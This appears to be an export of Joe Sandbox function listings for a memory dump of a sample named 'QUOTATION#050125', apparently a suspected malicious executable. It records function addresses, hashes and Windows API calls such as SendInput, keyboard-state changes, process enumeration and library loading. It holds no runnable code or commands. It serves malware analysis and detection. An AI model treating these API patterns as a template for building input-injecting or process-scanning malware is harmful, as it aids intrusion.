Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 525ea443dd656e315dcad65be64cff231c98c46aa0a5a0e122ef931768b437d4
Instruction ID: f67a47d5ad20fabf5de6768d46d4683a32ead702d711727fb8e66744d1afa2f2
Opcode Fuzzy Hash: 525ea443dd656e315dcad65be64cff231c98c46aa0a5a0e122ef931768b437d4
Instruction Fuzzy Hash: 7431A134A55A08EFFB249F18CC15BE83F65BB84390F984902BA21971E1E7B59DC0AB41

Function 004EAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75CEA2E0,?,00008000), ref: 004EABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 004EAC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 004EAC74
SendInput.USER32(00000001,?,0000001C,75CEA2E0,?,00008000), ref: 004EACC6

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9c57b8e52dba72257ebfb598d65dbba2b6b93c5b0c5241a9fdea2367c46ca6d9
Instruction ID: f4a4355b4e5250f582d4938bad99010c1de520b2f0011d8e4062299d7e868387
Opcode Fuzzy Hash: 9c57b8e52dba72257ebfb598d65dbba2b6b93c5b0c5241a9fdea2367c46ca6d9
Instruction Fuzzy Hash: 85312A309403986FEB34CB6688087FB7A65AF85312F28461BE481522D0C33DA9A5975B

Function 00517674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0051769A
GetWindowRect.USER32(?,?), ref: 00517710
PtInRect.USER32(?,?,00518B89), ref: 00517720
MessageBeep.USER32(00000000), ref: 0051778C

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f5df64de6802e148ed9fceb949674ada8346d1ebd7e11b19de7c133fef07a055
Instruction ID: 3cb38c5f23a8c965367d6542bb9e0135494e612c44b653df068064b4a5a4eb44
Opcode Fuzzy Hash: f5df64de6802e148ed9fceb949674ada8346d1ebd7e11b19de7c133fef07a055
Instruction Fuzzy Hash: 1F419A34A092199FEB01CF5CC894EE9BFF5FB5D310F1580A8E8149B2A1C331A985DB90

Function 005116DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 005116EB

Part of subcall function 004E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004E3A57
Part of subcall function 004E3A3D: GetCurrentThreadId.KERNEL32 ref: 004E3A5E
Part of subcall function 004E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004E25B3), ref: 004E3A65

GetCaretPos.USER32(?), ref: 005116FF
ClientToScreen.USER32(00000000,?), ref: 0051174C
GetForegroundWindow.USER32 ref: 00511752

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 91c0a2619ba5763272858af88c2d2e84eb6c9c10083c131eae3f10ba24e64cdc
Instruction ID: ed2e874c5e761f6ec77152bee59fe5b3e118d33c780e16503148468cd048c36b
Opcode Fuzzy Hash: 91c0a2619ba5763272858af88c2d2e84eb6c9c10083c131eae3f10ba24e64cdc
Instruction Fuzzy Hash: CB315E71D00149AFDB00EFAAC881CEEBBF9EF48308B5084AEE515E7251D6359E45CBA4

Function 004E4C7D Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004E4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004E4CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004E4CEA
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004E4D10

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow
String ID:
API String ID: 2796087071-0
Opcode ID: ec8437c020414200dafda2458b583420dcf7f3660a395ae667ff720d2db2c085
Instruction ID: 7bffd8ae6140eb0aaea9d74002d2e2cb911a38afaf3eaa5661e16bf1ba15dd7b
Opcode Fuzzy Hash: ec8437c020414200dafda2458b583420dcf7f3660a395ae667ff720d2db2c085
Instruction Fuzzy Hash: 62212632204240BBEB159B3BAC09E7B7F9CDF95750F10803FF805CB292EA69DC0192A5

Function 004ED4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004ED501
Process32FirstW.KERNEL32(00000000,?), ref: 004ED50F
Process32NextW.KERNEL32(00000000,?), ref: 004ED52F
CloseHandle.KERNEL32(00000000), ref: 004ED5DC

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d2a0ac3a1252da21e949840d9c5e875e2dd9d92ecbf026bc52bd992a79d79242
Instruction ID: 939f672a66ef8a0b32f559d3610c8d79c4841264cf547972467d939876713302
Opcode Fuzzy Hash: d2a0ac3a1252da21e949840d9c5e875e2dd9d92ecbf026bc52bd992a79d79242
Instruction Fuzzy Hash: 1931C271008340AFD300EF55C885ABFBBF8EF99348F14092EF581822A1EB759948CB96

Function 00518FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00499BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00499BB2

GetCursorPos.USER32(?), ref: 00519001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,004D7711,?,?,?,?,?), ref: 00519016
GetCursorPos.USER32(?), ref: 0051905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,004D7711,?,?,?), ref: 00519094

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 0a66592c6387e720c0f36ed54ff280b1d2b8ff3ceac6898193e783e233564a5c
Instruction ID: 48d33c49452fdbac9b39797604d7f15266683c3c4323543e09dbbab2c0da7065
Opcode Fuzzy Hash: 0a66592c6387e720c0f36ed54ff280b1d2b8ff3ceac6898193e783e233564a5c
Instruction Fuzzy Hash: 33217F35601118EFEB25CF94CC68EEA7FB9FB49361F144069F9054B261C735AD90EB60

Function 004ED2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0051CB68), ref: 004ED2FB
GetLastError.KERNEL32 ref: 004ED30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 004ED319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0051CB68), ref: 004ED376

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 1e114426182e8413e13d615a8f3419634b24d31b5c18aa1f38c60d7b39b165f2
Instruction ID: 4c443994cce8b5055dd3b8d5705b4f86830b7949a31d5eacc37479d0c11b9568
Opcode Fuzzy Hash: 1e114426182e8413e13d615a8f3419634b24d31b5c18aa1f38c60d7b39b165f2
Instruction Fuzzy Hash: A221B4749082019F8300EF25C8814AF7BE4AF55359F504A1EF895C72E1D735D94ACB97

Function 00512782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0051280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00512824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00512832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00512840

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: c1eea85fce4c3dd623edf9ec5059ce15ed94be1c816d7d9652b1ba657fd289f9
Instruction ID: 77f4ce01897454095b2e385586d227aab21c06578716ac617f5e4121f566e1df
Opcode Fuzzy Hash: c1eea85fce4c3dd623edf9ec5059ce15ed94be1c816d7d9652b1ba657fd289f9
Instruction Fuzzy Hash: 7121AE35204211AFE7149B24C844FAA7F95FF85328F148158E4268B6E2C775EC92CB90

Function 004E78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,004E790A,?,000000FF,?,004E8754,00000000,?,0000001C,?,?), ref: 004E8D8C
Part of subcall function 004E8D7D: lstrcpyW.KERNEL32(00000000,?,?,004E790A,?,000000FF,?,004E8754,00000000,?,0000001C,?,?,00000000), ref: 004E8DB2
Part of subcall function 004E8D7D: lstrcmpiW.KERNEL32(00000000,?,004E790A,?,000000FF,?,004E8754,00000000,?,0000001C,?,?), ref: 004E8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,004E8754,00000000,?,0000001C,?,?,00000000), ref: 004E7923
lstrcpyW.KERNEL32(00000000,?,?,004E8754,00000000,?,0000001C,?,?,00000000), ref: 004E7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,004E8754,00000000,?,0000001C,?,?,00000000), ref: 004E7984

Strings

cdecl, xrefs: 004E797B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: dac11e5c64d2220f504788b701be66e4d4f9a5a286e5133a30e6f91ac9bc35db
Instruction ID: a274d4d071b956ccb38960a775b81110b7d25aac5e32db9d52715a49cd4f20e0
Opcode Fuzzy Hash: dac11e5c64d2220f504788b701be66e4d4f9a5a286e5133a30e6f91ac9bc35db
Instruction Fuzzy Hash: 9911E47A200281ABDF155F36C844E7B77A5FF95364B10802FE846C7365EB369801D755

Function 00517CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00517D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00517D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00517D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004FB7AD,00000000), ref: 00517D6B

Part of subcall function 00499BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00499BB2

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 643eefea739ca035a11e378e860f0fcd70d614293610eba3c93c9edca87d91e3
Instruction ID: 4dde136829ba284d5da4493abdbab0b406a7d1d772941bd94e88696ec343056f
Opcode Fuzzy Hash: 643eefea739ca035a11e378e860f0fcd70d614293610eba3c93c9edca87d91e3
Instruction Fuzzy Hash: EF11AC31244618AFDB109F2CDC04AA63FB5BF49364B118728F839CB2E0D7319D94DB80

Function 004BCDBD Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004BCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004BCDE9

Part of subcall function 004B3820: RtlAllocateHeap.NTDLL(00000000,?,00551444,?,0049FDF5,?,?,0048A976,00000010,00551440,004813FC,?,004813C6,?,00481129), ref: 004B3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004BCE0F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004BCE31

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
String ID:
API String ID: 1794362364-0
Opcode ID: 10726fa324805ad3325b8d0d5c130355aafcc47b8abafcd1ad8f16dda0e7677a
Instruction ID: 552a3a4298ad068bc3334b199381faf67d6ed07395ca69ef1e12f34818b44ae8
Opcode Fuzzy Hash: 10726fa324805ad3325b8d0d5c130355aafcc47b8abafcd1ad8f16dda0e7677a
Instruction Fuzzy Hash: 8901D472641215BF27211BB76CC8CFB6E6DDEC6BA1315412FF905CB300EA69CD0291B9

Function 004E1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 004E1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004E1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004E1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 004E1A8A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d67dfa3c3a3a3e5901985ff001323c280588dd605b35cd7de0041c3915559c69
Instruction ID: 0b4144cedf3c6be209cd65beeb4a860596d23c6d2a43f2a249c17ed0767c1832
Opcode Fuzzy Hash: d67dfa3c3a3a3e5901985ff001323c280588dd605b35cd7de0041c3915559c69
Instruction Fuzzy Hash: 62113C3AD41219FFEB10DBA5CD85FADBB78EB04750F2000A2E600B7290D6716E50DB94

Function 004EE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004EE1FD
MessageBoxW.USER32(?,?,?,?), ref: 004EE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004EE246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004EE24D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 3ac9312775f942606dae854620dd10e4d1243f4cbe73fc6dde77807c974a9674
Instruction ID: 48a16779f010a353c6a7d151c49c2cf192668f34a5383e492f8a5369ae1b06ad
Opcode Fuzzy Hash: 3ac9312775f942606dae854620dd10e4d1243f4cbe73fc6dde77807c974a9674
Instruction Fuzzy Hash: 75114876D04254BBC7009FA99C05BDF3FAC9B55311F00865AF925D3280C2B5890897A4

Function 00519EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00499BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00499BB2

GetClientRect.USER32(?,?), ref: 00519F31
GetCursorPos.USER32(?), ref: 00519F3B
ScreenToClient.USER32(?,?), ref: 00519F46
DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00519F7A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 4cf8c5d6430cc52a2711de8ad039db5ac34716b570804dfb6ba91fa3ffde1f5e
Instruction ID: 2b8b20f43fd3b678b42e6dfce4dba32d2b14104b4713c026ec4420edb8af5191
Opcode Fuzzy Hash: 4cf8c5d6430cc52a2711de8ad039db5ac34716b570804dfb6ba91fa3ffde1f5e
Instruction Fuzzy Hash: F011573290021ABBEB11EFA8C8999EE7FB9FB45311F004455F902E3140D331BAC6DBA5

Function 0048600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0048604C
GetStockObject.GDI32(00000011), ref: 00486060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0048606A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 40adc88cd72a4f7876761c589b27d5e2dfd842ea7de90fd0d7b90f7c9b93d0fd
Instruction ID: eedba91611f88d73d9d7a713abf91970abbe0f7785f3f1d2b34d04ac596a3614
Opcode Fuzzy Hash: 40adc88cd72a4f7876761c589b27d5e2dfd842ea7de90fd0d7b90f7c9b93d0fd
Instruction Fuzzy Hash: CE11AD72501508BFEF529FA48C54EEFBF69EF193A4F014206FA0556110C7369C60EBA9

Function 004B3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004813C6,00000000,00000000,?,004B301A,004813C6,00000000,00000000,00000000,?,004B328B,00000006,FlsSetValue), ref: 004B30A5
GetLastError.KERNEL32(?,004B301A,004813C6,00000000,00000000,00000000,?,004B328B,00000006,FlsSetValue,00522290,FlsSetValue,00000000,00000364,?,004B2E46), ref: 004B30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004B301A,004813C6,00000000,00000000,00000000,?,004B328B,00000006,FlsSetValue,00522290,FlsSetValue,00000000), ref: 004B30BF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 2ed13d09946efbe6fafa67668ba6220c590c97090bb93be32417d1e04a7f84de
Instruction ID: f96045e0f6642e056b2d63d0c312d9ce75919ecbfd0c98d74a8e3b0f216c42f2
Opcode Fuzzy Hash: 2ed13d09946efbe6fafa67668ba6220c590c97090bb93be32417d1e04a7f84de
Instruction Fuzzy Hash: C8014C36745332ABC7305F7E9C449D77B989F15B62B104621F915E3240C725D905C6F4

Function 004E7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 004E747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004E7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004E74AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 004E74CA

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

